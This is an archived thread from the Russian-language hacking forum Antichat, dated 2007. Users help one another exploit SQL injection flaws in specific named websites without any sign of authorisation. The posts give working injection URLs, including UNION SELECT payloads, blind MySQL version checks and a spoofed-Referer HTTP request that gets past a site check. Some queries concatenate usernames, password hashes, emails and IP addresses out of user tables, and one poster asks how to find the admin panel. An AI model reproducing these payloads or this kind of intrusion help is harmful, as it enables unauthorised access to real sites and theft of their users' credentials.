ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
22.11.2007, 18:05
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
помогите раскрыть, только не забудьте отписаться, оч. нужен этот сайт
__http://AudioAcoust.TkaT.ru/buy.php?id_product=-5701038821541+UnioN+selEct+null,null,null--
уязвимость как понемаете параметр id_product /когда создаешь "правильный" запрос, то он ругается/
Error: wrong SQL query #SELECT p.name, p.id_shop, p.url FROM price_products p, price_shops s WHERE p.id_product=-5701038821541 UnioN selEct null,null,null-- AND p.id_shop = s.id_shop AND s.public = 1#; Unknown table 's' in field list in filename on line 0
как я понимаю это из-за того что ид_шоп возвращает 0, но что я уже туда не прописывал)))), короче нужна ваша помощь.
|
|
|
22.11.2007, 18:33
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
во первых- это все таки Mysql, там используется /* для того что-б отбросить лишний запрос, во-вторых при null,null,null перебрасывает на главную страницу
в-третьих здесь можно использовать только blind-inj, а т. к. версия мускула 4.0
Код:
http://audioacoust.tkat.ru/buy.php?id_product=8263395341141+and+substring(version(),3,1)=0
то и использовать подзапросы не получится, вобщем имхо врядли что-то вытащить
__________________
Карфаген должен быть разрушен...
|
|
|
|
22.11.2007, 18:44
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
ещё раз спасибо Scipio, навёл на класную мысль, там такой прикол скрипт проверяет поле реверел и если ты пришёл не из ихнего сайта то рубит, выход такой
отправляем пакет с таким содержанием
GET http://audioacoust.tkat.ru/buy.php?id_product=-5701038821541+UnioN+selEct+213,231,version()/* HTTP/1.1
Referer: http://audioacoust.tkat.ru/?mod=offers&category=audioacoust&product=BBK+FSW-65
Accept: */*
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows
98)
Host: ya.ru
Proxy-Connection: Keep-Alive
и смотрим на поле Location=4.0.26, для этого отлично подходит программа инеткряк, есть на ачате.
пс2: млин класные ощющения, вспоминаешь как раньше это видел на видео Хакера))))
пс: по памяти коменты в МайСКЛ
1. /*
2. #
3. --
4. ;
/на счёт последнего не уверен))/
Последний раз редактировалось big_BRAT; 22.11.2007 в 19:02..
|
|
|
|
22.11.2007, 19:08
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Я кстати думал об этом, пробовал варианты, вот только насчет реферера не стал пробовать
__________________
Карфаген должен быть разрушен...
|
|
|
|
23.11.2007, 13:52
|
|
Познающий
Регистрация: 24.01.2006
Сообщений: 33
Провел на форуме:
413899
Репутация:
10
|
|
Такс ...
Вот запросец:
Код:
http://ecamera.tkat.ru/buy.php?id_product=-126507640116117+union+select+1,concat_ws(0x3a,U_Username,0x3a,U_Password),concat_ws(0x3a,U_Username,0x3a,U_Password)+from+w3t_Users+limit+0,20/*
Поля и Таблицы неподбирал.. если надо могу найти и выложить |
|
|
|
29.11.2007, 08:13
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
уязвимость какая-то непонятная:
PHP код:
http://www.rudtp.ru/articles.php?id=102
через union не получацо подобрать поля. Зато через group подбирает 8 полей. делаю
PHP код:
http://www.rudtp.ru/articles.php?id=-102+union+select+1,2,3,4,5,6,7,8+/*
а оно болтит выдает ошибку. ничего непонимаю  |
|
|
|
29.11.2007, 08:27
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от je0n
уязвимость какая-то непонятная:
PHP код:
http://www.rudtp.ru/articles.php?id=102
через union не получацо подобрать поля. Зато через group подбирает 8 полей. делаю
PHP код:
http://www.rudtp.ru/articles.php?id=-102+union+select+1,2,3,4,5,6,7,8+/*
а оно болтит выдает ошибку. ничего непонимаю mysql версии 3
Код:
http://www.rudtp.ru/articles.php?id=102+and+substring(version(),1,1)=3
union использовать нельзя
|
|
|
|
29.11.2007, 08:57
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
Сообщение от n1†R0x
mysql версии 3
Код:
http://www.rudtp.ru/articles.php?id=102+and+substring(version(),1,1)=3
union использовать нельзя  плохо
спасибо большое 
я так понимаю, что кроме имени пользователя из под которого выполняется запрос, я ничего достать оттуда не смогу? или и его не смогу достать?
|
|
|
|
01.12.2007, 13:39
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
http://www.e3e5.com/article.php?id=1440'
объясните что тут. ничего не получается 
еще вдогонку вопросец:
как узнать, что за СУБД, MySQL или MSSQL стоит?
Последний раз редактировалось je0n; 01.12.2007 в 13:49..
|
|
|
|
04.12.2007, 00:56
|
|
Новичок
Регистрация: 26.08.2007
Сообщений: 9
Провел на форуме:
62847
Репутация:
0
|
|
http://www.recado.ru/index.php?id=-1+union+select+0,1,concat_ws(char(58),id,username, pwdhash,technical_email,access_level,cp_access,ip) +from+constant_newpodarok.wm_users+limit+0,1
Как найти админку???
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
